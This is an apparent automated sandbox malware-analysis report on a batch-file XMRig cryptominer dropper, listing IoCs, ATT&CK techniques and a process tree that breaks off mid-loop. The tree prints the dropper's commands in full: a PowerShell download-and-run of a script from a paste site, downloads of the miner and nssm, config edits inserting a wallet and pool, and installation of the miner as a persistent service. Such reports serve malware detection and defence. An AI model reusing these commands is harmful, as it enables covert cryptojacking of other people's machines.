xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
1050s
max time network
1040s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
30-06-2024 18:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1736316219723.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001ab78-128.dat	family_xmrig
behavioral1/files/0x000700000001ab78-128.dat	xmrig
behavioral1/memory/756-131-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-413-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-414-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-415-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-416-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-417-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-418-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-419-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-420-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-421-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-422-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-423-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-424-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-425-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-426-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-427-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-428-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-429-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-430-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-431-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-432-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-433-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-434-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-435-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-436-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-437-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-438-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-439-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-440-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-441-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-442-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-443-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-444-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-445-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-446-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-447-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-448-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-449-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-451-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-452-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-453-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-454-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-455-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-456-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-457-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-458-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-459-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-460-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-461-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-462-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-463-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-464-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-465-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-466-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-467-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-468-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-469-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-470-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-471-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-472-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-473-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4548-474-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	1140	powershell.exe
5	4724	powershell.exe
7	3888	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
756	xmrig.exe
1008	nssm.exe
2324	nssm.exe
4372	nssm.exe
4632	nssm.exe
4556	nssm.exe
1868	nssm.exe
4028	nssm.exe
4548	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
7	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5080	sc.exe
4064	sc.exe
3584	sc.exe
3332	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2668	powershell.exe
2280	powershell.exe
4624	powershell.exe
4724	powershell.exe
4364	powershell.exe
1140	powershell.exe
2200	powershell.exe
1012	powershell.exe
3156	powershell.exe
2776	powershell.exe
2524	powershell.exe
4100	powershell.exe
3888	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
2160	Process not Found
4304	Process not Found
1392	Process not Found
2896	timeout.exe
4124	timeout.exe
412	Process not Found
2100	Process not Found
4920	Process not Found
4536	timeout.exe
1012	timeout.exe
1976	timeout.exe
1012	timeout.exe
3156	timeout.exe
2744	timeout.exe
324	Process not Found
2112	Process not Found
2632	timeout.exe
3828	timeout.exe
1932	timeout.exe
2760	timeout.exe
1928	timeout.exe
3320	timeout.exe
3560	Process not Found
3552	timeout.exe
3824	timeout.exe
2536	timeout.exe
4376	Process not Found
3092	Process not Found
2904	Process not Found
2968	timeout.exe
5044	timeout.exe
4376	timeout.exe
4052	timeout.exe
4716	timeout.exe
4532	Process not Found
2092	Process not Found
824	Process not Found
3296	timeout.exe
652	Process not Found
1732	timeout.exe
4584	timeout.exe
2760	timeout.exe
600	timeout.exe
4456	Process not Found
4396	timeout.exe
4536	Process not Found
4912	Process not Found
1720	timeout.exe
2100	timeout.exe
3588	Process not Found
4176	timeout.exe
3988	timeout.exe
2164	timeout.exe
1332	Process not Found
1124	Process not Found
4924	timeout.exe
4144	timeout.exe
364	timeout.exe
1936	Process not Found
2520	timeout.exe
3648	timeout.exe
612	Process not Found
1368	Process not Found
3248	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3588	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
1140	powershell.exe
1140	powershell.exe
1140	powershell.exe
4724	powershell.exe
4724	powershell.exe
4724	powershell.exe
2668	powershell.exe
2668	powershell.exe
2668	powershell.exe
2200	powershell.exe
2200	powershell.exe
2200	powershell.exe
2280	powershell.exe
2280	powershell.exe
2280	powershell.exe
2524	powershell.exe
2524	powershell.exe
2524	powershell.exe
4100	powershell.exe
4100	powershell.exe
4100	powershell.exe
4624	powershell.exe
4624	powershell.exe
4624	powershell.exe
1012	powershell.exe
1012	powershell.exe
1012	powershell.exe
3156	powershell.exe
3156	powershell.exe
3156	powershell.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe
3888	powershell.exe
3888	powershell.exe
3888	powershell.exe
4364	powershell.exe
4364	powershell.exe
4364	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
632	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1140	powershell.exe
Token: SeDebugPrivilege	3588	taskkill.exe
Token: SeDebugPrivilege	4724	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeDebugPrivilege	4624	powershell.exe
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	3156	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	3888	powershell.exe
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeLockMemoryPrivilege	4548	xmrig.exe
Token: SeIncreaseQuotaPrivilege	2636	WMIC.exe
Token: SeSecurityPrivilege	2636	WMIC.exe
Token: SeTakeOwnershipPrivilege	2636	WMIC.exe
Token: SeLoadDriverPrivilege	2636	WMIC.exe
Token: SeSystemProfilePrivilege	2636	WMIC.exe
Token: SeSystemtimePrivilege	2636	WMIC.exe
Token: SeProfSingleProcessPrivilege	2636	WMIC.exe
Token: SeIncBasePriorityPrivilege	2636	WMIC.exe
Token: SeCreatePagefilePrivilege	2636	WMIC.exe
Token: SeBackupPrivilege	2636	WMIC.exe
Token: SeRestorePrivilege	2636	WMIC.exe
Token: SeShutdownPrivilege	2636	WMIC.exe
Token: SeDebugPrivilege	2636	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2636	WMIC.exe
Token: SeRemoteShutdownPrivilege	2636	WMIC.exe
Token: SeUndockPrivilege	2636	WMIC.exe
Token: SeManageVolumePrivilege	2636	WMIC.exe
Token: 33	2636	WMIC.exe
Token: 34	2636	WMIC.exe
Token: 35	2636	WMIC.exe
Token: 36	2636	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2636	WMIC.exe
Token: SeSecurityPrivilege	2636	WMIC.exe
Token: SeTakeOwnershipPrivilege	2636	WMIC.exe
Token: SeLoadDriverPrivilege	2636	WMIC.exe
Token: SeSystemProfilePrivilege	2636	WMIC.exe
Token: SeSystemtimePrivilege	2636	WMIC.exe
Token: SeProfSingleProcessPrivilege	2636	WMIC.exe
Token: SeIncBasePriorityPrivilege	2636	WMIC.exe
Token: SeCreatePagefilePrivilege	2636	WMIC.exe
Token: SeBackupPrivilege	2636	WMIC.exe
Token: SeRestorePrivilege	2636	WMIC.exe
Token: SeShutdownPrivilege	2636	WMIC.exe
Token: SeDebugPrivilege	2636	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2636	WMIC.exe
Token: SeRemoteShutdownPrivilege	2636	WMIC.exe
Token: SeUndockPrivilege	2636	WMIC.exe
Token: SeManageVolumePrivilege	2636	WMIC.exe
Token: 33	2636	WMIC.exe
Token: 34	2636	WMIC.exe
Token: 35	2636	WMIC.exe
Token: 36	2636	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3296	WMIC.exe
Token: SeSecurityPrivilege	3296	WMIC.exe
Token: SeTakeOwnershipPrivilege	3296	WMIC.exe
Token: SeLoadDriverPrivilege	3296	WMIC.exe
Token: SeSystemProfilePrivilege	3296	WMIC.exe
Token: SeSystemtimePrivilege	3296	WMIC.exe
Token: SeProfSingleProcessPrivilege	3296	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4548	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4604 wrote to memory of 1140	4604	cmd.exe	72
PID 4604 wrote to memory of 1140	4604	cmd.exe	72
PID 1140 wrote to memory of 4648	1140	powershell.exe	73
PID 1140 wrote to memory of 4648	1140	powershell.exe	73
PID 4648 wrote to memory of 316	4648	cmd.exe	74
PID 4648 wrote to memory of 316	4648	cmd.exe	74
PID 316 wrote to memory of 416	316	net.exe	75
PID 316 wrote to memory of 416	316	net.exe	75
PID 4648 wrote to memory of 4512	4648	cmd.exe	76
PID 4648 wrote to memory of 4512	4648	cmd.exe	76
PID 4648 wrote to memory of 4424	4648	cmd.exe	77
PID 4648 wrote to memory of 4424	4648	cmd.exe	77
PID 4648 wrote to memory of 3664	4648	cmd.exe	78
PID 4648 wrote to memory of 3664	4648	cmd.exe	78
PID 4648 wrote to memory of 3644	4648	cmd.exe	79
PID 4648 wrote to memory of 3644	4648	cmd.exe	79
PID 4648 wrote to memory of 4032	4648	cmd.exe	80
PID 4648 wrote to memory of 4032	4648	cmd.exe	80
PID 4648 wrote to memory of 3584	4648	cmd.exe	81
PID 4648 wrote to memory of 3584	4648	cmd.exe	81
PID 4648 wrote to memory of 3332	4648	cmd.exe	82
PID 4648 wrote to memory of 3332	4648	cmd.exe	82
PID 4648 wrote to memory of 3588	4648	cmd.exe	83
PID 4648 wrote to memory of 3588	4648	cmd.exe	83
PID 4648 wrote to memory of 4724	4648	cmd.exe	85
PID 4648 wrote to memory of 4724	4648	cmd.exe	85
PID 4648 wrote to memory of 2668	4648	cmd.exe	86
PID 4648 wrote to memory of 2668	4648	cmd.exe	86
PID 4648 wrote to memory of 2200	4648	cmd.exe	87
PID 4648 wrote to memory of 2200	4648	cmd.exe	87
PID 4648 wrote to memory of 756	4648	cmd.exe	88
PID 4648 wrote to memory of 756	4648	cmd.exe	88
PID 4648 wrote to memory of 3024	4648	cmd.exe	89
PID 4648 wrote to memory of 3024	4648	cmd.exe	89
PID 3024 wrote to memory of 2280	3024	cmd.exe	90
PID 3024 wrote to memory of 2280	3024	cmd.exe	90
PID 2280 wrote to memory of 1332	2280	powershell.exe	91
PID 2280 wrote to memory of 1332	2280	powershell.exe	91
PID 4648 wrote to memory of 2524	4648	cmd.exe	92
PID 4648 wrote to memory of 2524	4648	cmd.exe	92
PID 4648 wrote to memory of 4100	4648	cmd.exe	93
PID 4648 wrote to memory of 4100	4648	cmd.exe	93
PID 4648 wrote to memory of 4624	4648	cmd.exe	94
PID 4648 wrote to memory of 4624	4648	cmd.exe	94
PID 4648 wrote to memory of 1012	4648	cmd.exe	95
PID 4648 wrote to memory of 1012	4648	cmd.exe	95
PID 4648 wrote to memory of 3156	4648	cmd.exe	96
PID 4648 wrote to memory of 3156	4648	cmd.exe	96
PID 4648 wrote to memory of 2776	4648	cmd.exe	97
PID 4648 wrote to memory of 2776	4648	cmd.exe	97
PID 4648 wrote to memory of 3888	4648	cmd.exe	98
PID 4648 wrote to memory of 3888	4648	cmd.exe	98
PID 4648 wrote to memory of 4364	4648	cmd.exe	99
PID 4648 wrote to memory of 4364	4648	cmd.exe	99
PID 4648 wrote to memory of 5080	4648	cmd.exe	100
PID 4648 wrote to memory of 5080	4648	cmd.exe	100
PID 4648 wrote to memory of 4064	4648	cmd.exe	101
PID 4648 wrote to memory of 4064	4648	cmd.exe	101
PID 4648 wrote to memory of 1008	4648	cmd.exe	102
PID 4648 wrote to memory of 1008	4648	cmd.exe	102
PID 4648 wrote to memory of 2324	4648	cmd.exe	103
PID 4648 wrote to memory of 2324	4648	cmd.exe	103
PID 4648 wrote to memory of 4372	4648	cmd.exe	104
PID 4648 wrote to memory of 4372	4648	cmd.exe	104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1736316219723.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE3C8.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4648
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:316
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:416
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:4512
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:4424
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:3664
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:3644
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:4032
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3584
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3332
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2200
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3024
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2280
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:1332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Gkutwgdf\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3888
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4364
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:5080
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4064
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:1008
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:2324
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:4372
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:4632
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:4556
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:1868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2196
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2636
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3296
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2648
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2900
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4384
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2468
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:60
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
